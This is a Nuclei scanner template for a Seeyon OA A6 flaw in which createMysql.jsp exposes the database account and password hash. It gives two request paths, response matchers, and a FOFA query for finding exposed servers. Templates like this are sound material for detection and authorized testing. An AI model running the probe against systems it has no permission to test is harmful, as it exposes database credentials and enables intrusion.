id: seeyon-createmysql-exposure

info:
  name: Seeyon OA A6 createMysql.jsp Database - Information Disclosure
  author: SleepingBag945
  severity: medium
  description: |
    Seeyon OA A6 has leaked sensitive database information. An attacker can obtain the database account and password MD5 by accessing a specific URL.
  reference:
    - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20createMysql.jsp%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
  metadata:
    verified: true
    max-request: 2
    fofa-query: title="致远A8+协同管理软件.A6"
  tags: seeyon,oa,info-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/yyoa/createMysql.jsp"
      - "{{BaseURL}}/yyoa/ext/createMysql.jsp"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "root</br>"

      - type: regex
        part: body
        regex:
          - "[*][0-zA-Z]{40}</br>"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100ee9988573daed066e9deadae2dddf213a5fd2325a44738ffc07d7ab96b3bd05102200ec1fe8f49e272746f2100a627d4a08d9a7a556c875629d32b68b86f11314cba:922c64590222798bb761d5b6d8e72950